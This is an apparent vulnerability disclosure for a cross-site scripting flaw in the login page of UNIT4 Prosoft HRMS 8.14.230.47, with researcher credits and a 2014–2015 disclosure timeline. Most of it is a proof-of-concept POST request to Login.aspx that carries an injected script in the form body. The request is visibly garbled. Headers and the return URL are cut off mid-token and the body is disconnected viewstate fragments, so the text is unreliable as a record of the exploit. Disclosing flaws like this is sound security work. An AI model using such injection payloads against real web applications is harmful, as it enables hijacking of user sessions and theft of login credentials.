# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/
# Affected version: 8.14.230.47
# Fixed version: 8.14.330.43
# Credit: Jerold Hoong & Edric Teo
# PROOF OF CONCEPT
The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting.
POST /Login.aspx?ReturnUrl=%
%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__
kFgICAQ8WAh4EVGV4dAVfPGxpbmsgc
mYXVsdC9JbWFnZXMvRmF2SWNvbi5pY
DxYCHgdWaXNpYmxlaGRkAgMPZBYCZg
0ZXJzLiAoVVNSLlVzZXJDb2RlKWRkA
NsaWVudCBDb2RlZGQCBQ8PFgIeDEVy
ZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QW
kZGQCBw9kFgQCAQ8PFgIfAAULTERBU
8PZBYCHgxhdXRvY29tcGxldGUFA29m
GRkAhMPDxYCHwFoZBYEAgEPDxYCHwA
HlvdXIgcGFzc3dvcmQ%
ZGQCCw9kFgJmD2QWBAIDDxYCHwAFQk
GUgTHRkLiBBbGwgUmlnaHRzIFJlc2V
yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&
WxaLXDALD94uUBwZOBjPAY1F7DZ4L5
C%2Fscript%3E&txtPassword=&
# TIMELINE
– 28/10/2014: Vulnerability found
– 04/11/2014: Vendor informed
– 04/11/2014: Vendor responded
– 30/11/2014: Vendor fixed the issue
– 14/02/2015: Public disclosure
Komentarų nėra:
Rašyti komentarą